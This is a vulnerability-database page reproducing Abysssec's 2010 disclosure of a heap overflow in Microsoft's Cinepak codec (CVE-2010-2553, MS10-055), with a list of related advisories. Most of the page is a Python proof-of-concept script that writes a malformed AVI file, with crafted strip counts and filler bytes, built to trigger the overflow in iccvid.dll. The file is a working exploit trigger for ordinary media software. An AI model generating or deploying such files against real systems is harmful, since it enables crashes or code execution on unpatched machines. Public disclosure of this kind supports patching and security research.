Month Of Abysssec Undisclosed Bugs - Microsoft Cinepak

🗓️ 28 Sep 2010 00:00:00Reported by AbysssecType

packetstorm🔗 packetstormsecurity.com👁 32 Views

Month Of Abysssec Undisclosed Bugs - Microsoft Cinepak Codec CVDecompress Heap Overflow version iccvid.dll XP SP3, Impact High, CVE-2010-255

Reporter	Title	Published	Views	Family All 19
0day.today	Microsoft Cinepak Codec CVDecompress Heap Overflow	27 Sep 201000:00	–	zdt
Circl	CVE-2010-2553	26 Sep 201000:00	–	circl
Check Point Advisories	Microsoft Windows Cinepak Codec Remote Code Execution (MS10-055; CVE-2010-2553)	10 Aug 201000:00	–	checkpoint_advisories
Check Point Advisories	Microsoft Windows Cinepak Codec Remote Code Execution (MS10-055) - Ver2 (CVE-2010-2553)	31 Mar 201400:00	–	checkpoint_advisories
CVE	CVE-2010-2553	11 Aug 201018:00	–	cve
Cvelist	CVE-2010-2553	11 Aug 201018:00	–	cvelist
Exploit DB	Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)	26 Sep 201000:00	–	exploitdb
exploitpack	Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)	26 Sep 201000:00	–	exploitpack
NVD	CVE-2010-2553	11 Aug 201018:47	–	nvd
OpenVAS	Remote Code Execution Vulnerability in Cinepak Codec (982665)	11 Aug 201000:00	–	openvas

`'''  
  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/  
  
'''  
  
'''  
Title : Microsoft Cinepak Codec CVDecompress Heap Overflow  
Version : iccvid.dll XP SP3  
Analysis : http://www.abysssec.com  
Vendor : http://www.microsoft.com  
Impact : High  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
CVE : CVE-2010-2553  
MOAUB Number :  
'''  
  
  
import sys  
  
def main():  
  
aviHeaders = '\x52\x49\x46\x46\x58\x01\x00\x00\x41\x56\x49\x20\x4C\x49\x53\x54\xC8\x00\x00\x00\x68\x64\x72\x6C\x61\x76\x69\x68\x38\x00\x00\x00\xA0\x86\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x4E\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x7C\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73\x63\x76\x69\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE8\x03\x00\x00\x10\x27\x00\x00\x00\x00\x00\x00\x4E\x00\x00\x00\x20\x74\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x60\x01\x20\x01\x73\x74\x72\x66\x28\x00\x00\x00\x28\x00\x00\x00\x50\x01\x00\x00\x20\x01\x00\x00\x01\x00\x18\x00\x63\x76\x69\x64\x84\x8D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'  
padding = '\x4A\x55\x4E\x4B\x00\x00\x00\x00\x4A\x55\x4E\x4B\x00\x00\x00\x00'  
movi_tag = '\x4C\x49\x53\x54\x5C\x00\x00\x00\x6D\x6F\x76\x69\x30\x30\x64\x63\x10\x00\x00\x00'  
cinepak_codec_data1 = '\x00\x00\x00\x68\x01\x60\x01\x20'  
number_of_coded_strips = '\x00\x10'  
cinepak_codec_data2 = '\x10\x00\x00\x10\x00\x00\x00\x00\x00\x60\x01\x60\x20\x00\x00\x00\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x00'  
idx_tag = '\x69\x64\x78\x31\x10\x00\x00\x00\x30\x30\x64\x63\x10\x00\x00\x00\x04\x00\x00\x00\x68\x00\x00\x00'  
  
avifile = open('poc.avi', 'wb+')  
avifile.write(aviHeaders)  
avifile.write(padding)  
avifile.write(movi_tag)  
avifile.write(cinepak_codec_data1)  
avifile.write(number_of_coded_strips)  
avifile.write(cinepak_codec_data2)  
avifile.write(idx_tag)  
  
avifile.close()  
print '[-] AVI file generated'  
  
if __name__ == '__main__':  
main()  
  
`

28 Sep 2010 00:00Current

6.4Medium risk

Vulners AI Score6.4

EPSS0.68437